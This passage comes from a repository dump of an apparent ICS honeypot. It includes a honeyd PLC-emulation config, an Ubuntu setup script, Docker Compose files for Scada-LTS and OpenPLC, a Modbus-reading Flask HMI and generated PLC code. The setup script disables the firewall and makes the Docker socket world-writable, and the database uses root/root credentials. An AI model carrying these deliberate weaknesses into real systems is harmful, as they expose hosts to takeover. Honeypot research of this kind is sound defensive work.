18 | set allen_bardley_plc5 personality "Allen-Bradley PLC-5 programmable logic controller"
19 | add allen_bardley_plc5 tcp port 503 proxy 0.0.0.0:503
20 | set allen_bardley_plc5 default icmp action open
21 | set allen_bardley_plc5 ethernet "00:00:BC:18:51:A2"
22 | bind 192.168.1.170 allen_bardley_plc5
23 |
24 | create simens_s7_1200
25 | set simens_s7_1200 personality "Siemens Simatic 1200 programmable logic controller"
26 | add simens_s7_1200 tcp port 504 proxy 0.0.0.0:504
27 | set simens_s7_1200 default icmp action open
28 | set simens_s7_1200 ethernet "8C:F3:19:D9:A6:11"
29 | bind 192.168.1.171 simens_s7_1200
--------------------------------------------------------------------------------
/honeyd/libsnap7.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/honeyd/libsnap7.so
--------------------------------------------------------------------------------
/honeyd/s7commServer:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/honeyd/s7commServer
--------------------------------------------------------------------------------
/init.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | cwd=$(pwd)
4 | version=$(lsb_release -rs )
5 |
6 | # Wrong version warning
7 | if [ "$version" != "22.04" ] && [ "$version" != "20.04" ] && [ "$version" != "18.04" ];
8 | then
9 | printf "Warning! This installation script has only been tested on Ubuntu 20.04, 22.04 LTS and 18.04 LTS and will likely not work on your Ubuntu version.\n\n"
10 | fi
11 |
12 | #install docker and docker-compose
13 | echo "Install Docker on your Ubuntu system."
14 | read -p "Do you want to proceed with the installation? (y/n): " choice
15 |
16 | if [ "$choice" != "y" ]; then
17 | echo "Installation aborted."
18 | exit 1
19 | fi
20 |
21 | echo "Updating package index..."
22 | sudo apt-get update
23 | sudo apt-get install \
24 | ca-certificates \
25 | curl \
26 | gnupg \
27 | lsb-release
28 |
29 | echo "Installing dependencies..."
30 | sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
31 |
32 | echo "Adding Docker's official GPG key..."
33 |
34 | sudo mkdir -p /etc/apt/keyrings
35 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
36 |
37 | echo "Adding Docker repository..."
38 | echo \
39 | "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
40 | $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
41 |
42 | echo "Updating package index again..."
43 | sudo chmod a+r /etc/apt/keyrings/docker.gpg
44 | sudo apt-get update
45 |
46 | echo "Installing Docker..."
47 | sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin docker-compose
48 |
49 | echo "Docker installation completed!"
50 | #FOr permission denied while trying to connect to the Docker daemon socket
51 | sudo chmod 666 /var/run/docker.sock
52 |
53 |
54 | sleep 3
55 |
56 | # Update apt
57 | sudo apt update
58 | #Disable the firewall
59 | sudo ufw disable
60 | #set the vm.max_map_count for elasticsearch
61 | sysctl -w vm.max_map_count=262144
62 |
63 | # RUN Bottle Factory
64 | docker-compose -f bottlefactory/docker-compose.yml up -d
65 |
66 | # RUN Water tank Openplc
67 | docker-compose -f watertank/docker-compose.yml up -d
68 |
69 |
70 | # RUN SCADA LTS
71 | docker-compose -f scada/docker-compose.yml up -d
72 |
73 |
74 | #Run the zeek
75 | docker-compose -f zeek/docker-compose.yml up -d
76 |
77 |
78 | #Run the honeyd
79 | docker-compose -f honeyd/docker-compose.yml up -d
80 |
81 |
82 | #Check the running containers
83 | docker ps
--------------------------------------------------------------------------------
/log/MaliciousvsBenign.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/MaliciousvsBenign.pdf
--------------------------------------------------------------------------------
/log/Modbus.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/Modbus.pdf
--------------------------------------------------------------------------------
/log/countries_comparison.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/countries_comparison.pdf
--------------------------------------------------------------------------------
/log/dest_ports.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/dest_ports.pdf
--------------------------------------------------------------------------------
/log/http_methods.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/http_methods.pdf
--------------------------------------------------------------------------------
/log/modbus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/modbus.png
--------------------------------------------------------------------------------
/log/organization_stacked.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/organization_stacked.pdf
--------------------------------------------------------------------------------
/log/organizations.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/organizations.pdf
--------------------------------------------------------------------------------
/log/uniqueip.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/uniqueip.pdf
--------------------------------------------------------------------------------
/log/world_cloud&vsix.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_cloud&vsix.pdf
--------------------------------------------------------------------------------
/log/world_cloud.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_cloud.pdf
--------------------------------------------------------------------------------
/log/world_vsix.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_vsix.pdf
--------------------------------------------------------------------------------
/restart_docker_containers.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # add @hourly path/restart_docker_containers.sh to the cortab by cmd $ crontab -e
3 | # Get a list of all Docker containers
4 | containers=$(docker ps -a -q)
5 |
6 | # Iterate through each container
7 | for container in $containers
8 | do
9 | # Check if the container is stopped
10 | if [ "$(docker inspect -f '{{.State.Status}}' $container)" = "exited" ]; then
11 | # Restart the container
12 | docker restart $container
13 | echo "Container $container restarted."
14 | fi
15 | done
16 |
17 | echo "Finished checking and restarting Docker containers."
18 |
--------------------------------------------------------------------------------
/scada/HMI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/HMI.png
--------------------------------------------------------------------------------
/scada/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/README.md
--------------------------------------------------------------------------------
/scada/Water Tank.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/Water Tank.zip
--------------------------------------------------------------------------------
/scada/docker-compose.yml:
--------------------------------------------------------------------------------
1 | # Docker compose file to manage your deployed images.
2 | # Use MySQL server 5.7 and latest Scada-LTS local build.
3 | # Using attached webapps folder as developer you will be able to modify the static content from host os.
4 | # Attach shell to stop the tomcat instance and then you will be able to run in JPDA mode.
5 | version: '3'
6 | services:
7 | database:
8 | container_name: mysql
9 | image: mysql/mysql-server:5.7
10 | ports:
11 | - "3306:3306"
12 | environment:
13 | - MYSQL_ROOT_PASSWORD=root
14 | - MYSQL_USER=root
15 | - MYSQL_PASSWORD=root
16 | - MYSQL_DATABASE=scadalts
17 | expose: ["3306"]
18 | volumes:
19 | - scada_databases:/home/
20 | networks:
21 | wnet:
22 | ipv4_address: 192.168.0.24
23 | scadalts:
24 | image: scadalts/scadalts:latest
25 | environment:
26 | - CATALINA_OPTS=-Xmx512m -Xms512m
27 | ports:
28 | - "8000:8080"
29 | depends_on:
30 | - database
31 | expose: ["8080", "8000"]
32 | links:
33 | - database:database
34 | command:
35 | - /usr/bin/wait-for-it
36 | - --host=database
37 | - --port=3306
38 | - --timeout=30
39 | - --strict
40 | - --
41 | - /usr/local/tomcat/bin/catalina.sh
42 | - run
43 | networks:
44 | wnet:
45 | ipv4_address: 192.168.0.25
46 |
47 |
48 | networks:
49 | wnet:
50 | driver: bridge
51 | name: icsnet
52 | ipam:
53 | config:
54 | - subnet: 192.168.0.0/24
55 | gateway: 192.168.0.1
56 | driver_opts:
57 | com.docker.network.bridge.name: br_icsnet
58 | fnet:
59 | driver: bridge
60 | name: phynet
61 | ipam:
62 | config:
63 | - subnet: 192.168.1.0/24
64 | gateway: 192.168.1.1
65 | driver_opts:
66 | com.docker.network.bridge.name: br_phynet
67 |
68 |
69 | volumes:
70 | scada_databases:
--------------------------------------------------------------------------------
/tcpdump_start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | rm -f nohup.out
3 | sudo nohup tcpdump -ni ens160 -s 65535 -w captured_packets.pcap &
4 |
5 | # Write tcpdump's PID to a file
6 | echo $! > /var/run/tcpdump.pid
7 |
--------------------------------------------------------------------------------
/tcpdump_stop.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | if [ -f /var/run/tcpdump.pid ]
3 | then
4 | kill `cat /var/run/tcpdump.pid`
5 | echo tcpdump `cat /var/run/tcpdump.pid` killed.
6 | rm -f /var/run/tcpdump.pid
7 | else
8 | echo tcpdump not running.
9 | fi
--------------------------------------------------------------------------------
/watertank/README.md:
--------------------------------------------------------------------------------
1 | ## Open PLC
--------------------------------------------------------------------------------
/watertank/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | openplc:
4 | build:
5 | context: ./openplc
6 | dockerfile: Dockerfile
7 | # image: nikhilkc96/openplc
8 | stdin_open: true # docker run -i
9 | tty: true
10 | privileged: true
11 | # entrypoint: ["honeyd", "-d", "-f", "honeyd.conf", "-l", "honeyd.log"]
12 | container_name: openplc
13 | volumes:
14 | - "/etc/timezone:/etc/timezone:ro"
15 | - "/etc/localtime:/etc/localtime:ro"
16 | - openplc_data:/home
17 | ports:
18 | - 8080:8080
19 | - 502:502
20 | networks:
21 | wnet:
22 | ipv4_address: 192.168.0.26
23 | fnet:
24 | ipv4_address: 192.168.1.13
25 |
26 |
27 | openplc_hmi:
28 | build:
29 | context: ./hmi
30 | dockerfile: Dockerfile
31 | stdin_open: true # docker run -i
32 | tty: true
33 | privileged: true
34 | entrypoint: ["gunicorn", "app:app", "-b", "0.0.0.0:5000"]
35 | container_name: openplc_hmi
36 | volumes:
37 | - "/etc/timezone:/etc/timezone:ro"
38 | - "/etc/localtime:/etc/localtime:ro"
39 | ports:
40 | - 5000:5000
41 | networks:
42 | wnet:
43 | ipv4_address: 192.168.0.27
44 |
45 |
46 | openplc_simulation:
47 | container_name: openplc_sim_server
48 | build:
49 | context: ./openplc_sim
50 | dockerfile: Dockerfile
51 | stdin_open: true # docker run -i
52 | tty: true
53 | privileged: true
54 | # entrypoint: ["python3", "tcp_modbus.py"]
55 | networks:
56 | wnet:
57 | ipv4_address: 192.168.0.28
58 |
59 |
60 | networks:
61 | wnet:
62 | driver: bridge
63 | name: icsnet
64 | ipam:
65 | config:
66 | - subnet: 192.168.0.0/24
67 | gateway: 192.168.0.1
68 | driver_opts:
69 | com.docker.network.bridge.name: br_icsnet
70 | fnet:
71 | driver: bridge
72 | name: phynet
73 | ipam:
74 | config:
75 | - subnet: 192.168.1.0/24
76 | gateway: 192.168.1.1
77 | driver_opts:
78 | com.docker.network.bridge.name: br_phynet
79 |
80 |
81 |
82 | volumes:
83 | openplc_data:
--------------------------------------------------------------------------------
/watertank/hmi/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.9-slim-buster
2 |
3 | COPY . /hmi
4 |
5 | WORKDIR /hmi
6 |
7 | RUN pip3 install -r requirements.txt
8 |
9 | RUN chmod +x docker_entrypoint.sh
10 |
11 | # CMD ["gunicorn", "app:app", "-b", "0.0.0.0:5000"]
12 |
13 | # CMD ["./docker_entrypoint.sh"]
--------------------------------------------------------------------------------
/watertank/hmi/app.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, render_template, current_app
2 | from pymodbus.client.sync import ModbusTcpClient
3 | from datetime import datetime
4 | from flask import jsonify
5 | import secrets
6 |
7 |
8 | app = Flask(__name__)
9 |
10 |
11 | secret_key = secrets.token_hex(16)
12 | # example output, secret_key = 000d88cd9d90036ebdd237eb6b0db000
13 | app.config['SECRET_KEY'] = secret_key
14 |
15 | # datetime object containing current date and time
16 | def current_time():
17 | now = datetime.now().isoformat()
18 | return now
19 |
20 | @app.route('/api',methods=['POST','GET'])
21 | def api():
22 | host = '192.168.0.26'
23 | port = 502
24 | client = ModbusTcpClient(host, port)
25 | client.connect()
26 | result = client.read_holding_registers(101,10,unit=0)
27 | data = {
28 | "datetime": current_time(),
29 | "data": result.registers
30 | }
31 | return jsonify(data)
32 |
33 | @app.route('/')
34 | def index():
35 | return (render_template('index.html'))
36 |
37 | if __name__ == '__main__':
38 |
39 | # port = int(os.environ.get('PORT', 7000))
40 | app.run()
--------------------------------------------------------------------------------
/watertank/hmi/docker_entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | exec python3 tcp_modbus.py &
6 | exec gunicorn app:app -b 0.0.0.0:5000
--------------------------------------------------------------------------------
/watertank/hmi/gunicorn.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | gunicorn --chdir app app:app -w 2 --threads 2 -b 0.0.0.0:5000
--------------------------------------------------------------------------------
/watertank/hmi/requirements.txt:
--------------------------------------------------------------------------------
1 | click==7.1.2
2 | Flask==2
3 | itsdangerous==2.0
4 | Jinja2==3.0
5 | MarkupSafe==2.0.0
6 | Werkzeug==2.0
7 | pymodbus==2.5.3
8 | pyserial==3.5
9 | six==1.16.0
10 | gunicorn==20.0.4
11 |
--------------------------------------------------------------------------------
/watertank/hmi/static/css/styles.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/css/styles.css
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/siemens_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/siemens_logo.png
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/tank.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/tank.jpeg
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/user-avatar-with-check-mark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/user-avatar-with-check-mark.png
--------------------------------------------------------------------------------
/watertank/hmi/static/js/main.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/js/main.js
--------------------------------------------------------------------------------
/watertank/openplc-program/beremiz.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.c:
--------------------------------------------------------------------------------
1 | /*******************************************/
2 | /* FILE GENERATED BY iec2c */
3 | /* Editing this file is not recommended... */
4 | /*******************************************/
5 |
6 | #include "iec_std_lib.h"
7 |
8 | #include "accessor.h"
9 |
10 | #include "POUS.h"
11 |
12 | // CONFIGURATION CONFIG0
13 |
14 | void RES0_init__(void);
15 |
16 | void config_init__(void) {
17 | BOOL retain;
18 | retain = 0;
19 |
20 | RES0_init__();
21 | }
22 |
23 | void RES0_run__(unsigned long tick);
24 |
25 | void config_run__(unsigned long tick) {
26 | RES0_run__(tick);
27 | }
28 | unsigned long long common_ticktime__ = 20000000ULL; /*ns*/
29 | unsigned long greatest_tick_count__ = 0UL; /*tick*/
30 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.h:
--------------------------------------------------------------------------------
1 | #include "beremiz.h"
2 |
3 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Config0.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/LOCATED_VARIABLES.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/LOCATED_VARIABLES.h
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.c:
--------------------------------------------------------------------------------
1 | #include "POUS.h"
2 | void LOGGER_init__(LOGGER *data__, BOOL retain) {
3 | __INIT_VAR(data__->EN,__BOOL_LITERAL(TRUE),retain)
4 | __INIT_VAR(data__->ENO,__BOOL_LITERAL(TRUE),retain)
5 | __INIT_VAR(data__->TRIG,__BOOL_LITERAL(FALSE),retain)
6 | __INIT_VAR(data__->MSG,__STRING_LITERAL(0,""),retain)
7 | __INIT_VAR(data__->LEVEL,LOGLEVEL__INFO,retain)
8 | __INIT_VAR(data__->TRIG0,__BOOL_LITERAL(FALSE),retain)
9 | }
10 |
11 | // Code part
12 | void LOGGER_body__(LOGGER *data__) {
13 | // Control execution
14 | if (!__GET_VAR(data__->EN)) {
15 | __SET_VAR(data__->,ENO,,__BOOL_LITERAL(FALSE));
16 | return;
17 | }
18 | else {
19 | __SET_VAR(data__->,ENO,,__BOOL_LITERAL(TRUE));
20 | }
21 | // Initialise TEMP variables
22 |
23 | if ((__GET_VAR(data__->TRIG,) && !(__GET_VAR(data__->TRIG0,)))) {
24 | #define GetFbVar(var,...) __GET_VAR(data__->var,__VA_ARGS__)
25 | #define SetFbVar(var,val,...) __SET_VAR(data__->,var,__VA_ARGS__,val)
26 |
27 | LogMessage(GetFbVar(LEVEL),(char*)GetFbVar(MSG, .body),GetFbVar(MSG, .len));
28 |
29 | #undef GetFbVar
30 | #undef SetFbVar
31 | ;
32 | };
33 | __SET_VAR(data__->,TRIG0,,__GET_VAR(data__->TRIG,));
34 |
35 | goto __end;
36 |
37 | __end:
38 | return;
39 | } // LOGGER_body__()
40 |
41 |
42 |
43 |
44 |
45 | void MAIN_init__(MAIN *data__, BOOL retain) {
46 | __INIT_VAR(data__->I_PBFILL,__BOOL_LITERAL(FALSE),retain)
47 | __INIT_VAR(data__->I_PBDISCHARGE,__BOOL_LITERAL(TRUE),retain)
48 | __INIT_VAR(data__->Q_FILLVALVE,__BOOL_LITERAL(FALSE),retain)
49 | __INIT_VAR(data__->Q_FILLLIGHT,__BOOL_LITERAL(FALSE),retain)
50 | __INIT_VAR(data__->Q_DISCHARGEVALVE,__BOOL_LITERAL(FALSE),retain)
51 | __INIT_VAR(data__->Q_LIGHTDISCHARGE,__BOOL_LITERAL(FALSE),retain)
52 | __INIT_VAR(data__->Q_DISPLAY,0,retain)
53 | __INIT_VAR(data__->FILLING,__BOOL_LITERAL(FALSE),retain)
54 | __INIT_VAR(data__->DISCHARGING,__BOOL_LITERAL(FALSE),retain)
55 | __INIT_VAR(data__->TIMEFILLING,__time_to_timespec(1, 0, 0, 0, 0, 0),retain)
56 | __INIT_VAR(data__->TIMEFILLINGINT,0,retain)
57 | __INIT_VAR(data__->TIMEDISCHARGING,__time_to_timespec(1, 0, 0, 0, 0, 0),retain)
58 | __INIT_VAR(data__->TIMEDISCHARGINGINT,0,retain)
59 | TON_init__(&data__->TON0,retain);
60 | RS_init__(&data__->RS0,retain);
61 | R_TRIG_init__(&data__->R_TRIG0,retain);
62 | TON_init__(&data__->TON1,retain);
63 | RS_init__(&data__->RS1,retain);
64 | F_TRIG_init__(&data__->F_TRIG0,retain);
65 | __INIT_VAR(data__->PLACEHOLDER,0,retain)
66 | __INIT_VAR(data__->SIMULATION,0,retain)
67 | __INIT_VAR(data__->_TMP_NOT11_OUT,__BOOL_LITERAL(FALSE),retain)
68 | __INIT_VAR(data__->_TMP_AND12_OUT,__BOOL_LITERAL(FALSE),retain)
69 | __INIT_VAR(data__->_TMP_NOT21_OUT,__BOOL_LITERAL(FALSE),retain)
70 | __INIT_VAR(data__->_TMP_AND22_OUT,__BOOL_LITERAL(FALSE),retain)
71 | __INIT_VAR(data__->_TMP_TIME_TO_INT27_OUT,0,retain)
72 | __INIT_VAR(data__->_TMP_TIME_TO_INT28_OUT,0,retain)
73 | __INIT_VAR(data__->_TMP_ADD57_OUT,0,retain)
74 | }
75 |
76 | // Code part
77 | void MAIN_body__(MAIN *data__) {
78 | // Initialise TEMP variables
79 |
80 | __SET_VAR(data__->R_TRIG0.,CLK,,__GET_VAR(data__->I_PBFILL,));
81 | R_TRIG_body__(&data__->R_TRIG0);
82 | __SET_VAR(data__->,_TMP_NOT11_OUT,,!(__GET_VAR(data__->DISCHARGING,)));
83 | __SET_VAR(data__->,_TMP_AND12_OUT,,AND__BOOL__BOOL(
84 | (BOOL)__BOOL_LITERAL(TRUE),
85 | NULL,
86 | (UINT)2,
87 | (BOOL)__GET_VAR(data__->R_TRIG0.Q,),
88 | (BOOL)__GET_VAR(data__->_TMP_NOT11_OUT,)));
89 | __SET_VAR(data__->TON0.,IN,,__GET_VAR(data__->FILLING,));
90 | __SET_VAR(data__->TON0.,PT,,__time_to_timespec(1, 0, 8, 0, 0, 0));
91 | TON_body__(&data__->TON0);
92 | __SET_VAR(data__->RS0.,S,,__GET_VAR(data__->_TMP_AND12_OUT,));
93 | __SET_VAR(data__->RS0.,R1,,__GET_VAR(data__->TON0.Q,));
94 | RS_body__(&data__->RS0);
95 | __SET_VAR(data__->,FILLING,,__GET_VAR(data__->RS0.Q1,));
96 | __SET_VAR(data__->,TIMEFILLING,,__GET_VAR(data__->TON0.ET,));
97 | __SET_VAR(data__->F_TRIG0.,CLK,,__GET_VAR(data__->I_PBDISCHARGE,));
98 | F_TRIG_body__(&data__->F_TRIG0);
99 | __SET_VAR(data__->,_TMP_NOT21_OUT,,!(__GET_VAR(data__->FILLING,)));
100 | __SET_VAR(data__->,_TMP_AND22_OUT,,AND__BOOL__BOOL(
101 | (BOOL)__BOOL_LITERAL(TRUE),
102 | NULL,
103 | (UINT)2,
104 | (BOOL)__GET_VAR(data__->F_TRIG0.Q,),
105 | (BOOL)__GET_VAR(data__->_TMP_NOT21_OUT,)));
106 | __SET_VAR(data__->TON1.,IN,,__GET_VAR(data__->DISCHARGING,));
107 | __SET_VAR(data__->TON1.,PT,,__time_to_timespec(1, 0, 8, 0, 0, 0));
108 | TON_body__(&data__->TON1);
109 | __SET_VAR(data__->RS1.,S,,__GET_VAR(data__->_TMP_AND22_OUT,));
110 | __SET_VAR(data__->RS1.,R1,,__GET_VAR(data__->TON1.Q,));
111 | RS_body__(&data__->RS1);
112 | __SET_VAR(data__->,DISCHARGING,,__GET_VAR(data__->RS1.Q1,));
113 | __SET_VAR(data__->,TIMEDISCHARGING,,__GET_VAR(data__->TON1.ET,));
114 | __SET_VAR(data__->,_TMP_TIME_TO_INT27_OUT,,TIME_TO_INT(
115 | (BOOL)__BOOL_LITERAL(TRUE),
116 | NULL,
117 | (TIME)__GET_VAR(data__->TIMEFILLING,)));
118 | __SET_VAR(data__->,TIMEFILLINGINT,,__GET_VAR(data__->_TMP_TIME_TO_INT27_OUT,));
119 | __SET_VAR(data__->,_TMP_TIME_TO_INT28_OUT,,TIME_TO_INT(
120 | (BOOL)__BOOL_LITERAL(TRUE),
121 | NULL,
122 | (TIME)__GET_VAR(data__->TIMEDISCHARGING,)));
123 | __SET_VAR(data__->,TIMEDISCHARGINGINT,,__GET_VAR(data__->_TMP_TIME_TO_INT28_OUT,));
124 | __SET_VAR(data__->,Q_FILLLIGHT,,__GET_VAR(data__->FILLING,));
125 | __SET_VAR(data__->,Q_FILLVALVE,,__GET_VAR(data__->FILLING,));
126 | __SET_VAR(data__->,Q_LIGHTDISCHARGE,,__GET_VAR(data__->DISCHARGING,));
127 | __SET_VAR(data__->,Q_DISCHARGEVALVE,,__GET_VAR(data__->DISCHARGING,));
128 | __SET_VAR(data__->,_TMP_ADD57_OUT,,ADD__INT__INT(
129 | (BOOL)__BOOL_LITERAL(TRUE),
130 | NULL,
131 | (UINT)2,
132 | (INT)__GET_VAR(data__->TIMEFILLINGINT,),
133 | (INT)__GET_VAR(data__->TIMEDISCHARGINGINT,)));
134 | __SET_VAR(data__->,Q_DISPLAY,,__GET_VAR(data__->_TMP_ADD57_OUT,));
135 |
136 | goto __end;
137 |
138 | __end:
139 | return;
140 | } // MAIN_body__()
141 |
142 |
143 |
144 |
145 |
146 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.h:
--------------------------------------------------------------------------------
1 | #include "beremiz.h"
2 | #ifndef __POUS_H
3 | #define __POUS_H
4 |
5 | #include "accessor.h"
6 | #include "iec_std_lib.h"
7 |
8 | __DECLARE_ENUMERATED_TYPE(LOGLEVEL,
9 | LOGLEVEL__CRITICAL,
10 | LOGLEVEL__WARNING,
11 | LOGLEVEL__INFO,
12 | LOGLEVEL__DEBUG
13 | )
14 | // FUNCTION_BLOCK LOGGER
15 | // Data part
16 | typedef struct {
17 | // FB Interface - IN, OUT, IN_OUT variables
18 | __DECLARE_VAR(BOOL,EN)
19 | __DECLARE_VAR(BOOL,ENO)
20 | __DECLARE_VAR(BOOL,TRIG)
21 | __DECLARE_VAR(STRING,MSG)
22 | __DECLARE_VAR(LOGLEVEL,LEVEL)
23 |
24 | // FB private variables - TEMP, private and located variables
25 | __DECLARE_VAR(BOOL,TRIG0)
26 |
27 | } LOGGER;
28 |
29 | void LOGGER_init__(LOGGER *data__, BOOL retain);
30 | // Code part
31 | void LOGGER_body__(LOGGER *data__);
32 | // PROGRAM MAIN
33 | // Data part
34 | typedef struct {
35 | // PROGRAM Interface - IN, OUT, IN_OUT variables
36 |
37 | // PROGRAM private variables - TEMP, private and located variables
38 | __DECLARE_VAR(BOOL,I_PBFILL)
39 | __DECLARE_VAR(BOOL,I_PBDISCHARGE)
40 | __DECLARE_VAR(BOOL,Q_FILLVALVE)
41 | __DECLARE_VAR(BOOL,Q_FILLLIGHT)
42 | __DECLARE_VAR(BOOL,Q_DISCHARGEVALVE)
43 | __DECLARE_VAR(BOOL,Q_LIGHTDISCHARGE)
44 | __DECLARE_VAR(INT,Q_DISPLAY)
45 | __DECLARE_VAR(BOOL,FILLING)
46 | __DECLARE_VAR(BOOL,DISCHARGING)
47 | __DECLARE_VAR(TIME,TIMEFILLING)
48 | __DECLARE_VAR(INT,TIMEFILLINGINT)
49 | __DECLARE_VAR(TIME,TIMEDISCHARGING)
50 | __DECLARE_VAR(INT,TIMEDISCHARGINGINT)
51 | TON TON0;
52 | RS RS0;
53 | R_TRIG R_TRIG0;
54 | TON TON1;
55 | RS RS1;
56 | F_TRIG F_TRIG0;
57 | __DECLARE_VAR(INT,PLACEHOLDER)
58 | __DECLARE_VAR(INT,SIMULATION)
59 | __DECLARE_VAR(BOOL,_TMP_NOT11_OUT)
60 | __DECLARE_VAR(BOOL,_TMP_AND12_OUT)
61 | __DECLARE_VAR(BOOL,_TMP_NOT21_OUT)
62 | __DECLARE_VAR(BOOL,_TMP_AND22_OUT)
63 | __DECLARE_VAR(INT,_TMP_TIME_TO_INT27_OUT)
64 | __DECLARE_VAR(INT,_TMP_TIME_TO_INT28_OUT)
65 | __DECLARE_VAR(INT,_TMP_ADD57_OUT)
66 |
67 | } MAIN;
68 |
69 | void MAIN_init__(MAIN *data__, BOOL retain);
70 | // Code part
71 | void MAIN_body__(MAIN *data__);
72 | #endif //__POUS_H
73 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/POUS.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Res0.c:
--------------------------------------------------------------------------------
1 | /*******************************************/
2 | /* FILE GENERATED BY iec2c */
3 | /* Editing this file is not recommended... */
4 | /*******************************************/
5 |
6 | #include "iec_std_lib.h"
7 |
8 | // RESOURCE RES0
9 |
10 | extern unsigned long long common_ticktime__;
11 |
12 | #include "accessor.h"
13 | #include "POUS.h"
14 |
15 | #include "Config0.h"
16 |
17 |
18 | BOOL TASK0;
19 | MAIN RES0__INSTANCE0;
20 | #define INSTANCE0 RES0__INSTANCE0
21 |
22 | void RES0_init__(void) {
23 | BOOL retain;
24 | retain = 0;
25 |
26 | TASK0 = __BOOL_LITERAL(FALSE);
27 | MAIN_init__(&INSTANCE0,retain);
28 | }
29 |
30 | void RES0_run__(unsigned long tick) {
31 | TASK0 = !(tick % 1);
32 | if (TASK0) {
33 | MAIN_body__(&INSTANCE0);
34 | }
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Res0.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Res0.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Scene_3.dynlib:
